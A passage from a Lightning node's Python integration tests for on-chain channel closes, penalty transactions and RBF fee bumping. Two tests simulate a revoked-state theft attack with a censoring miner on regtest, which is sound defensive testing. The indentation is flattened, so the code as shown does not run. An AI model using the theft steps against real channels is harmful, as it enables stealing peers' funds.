# after 5 blocks, l2 reclaims both their DELAYED_OUTPUT_TO_US and their delayed output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
# Use the bcli interface as well, so that we also check the
# bcli interface.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(121)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
# l1 should wait til to_self_delay (10), then fulfill onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# FIXME: We can get warnings from unilteral changes, since we treat
# such errors a soft because LND.
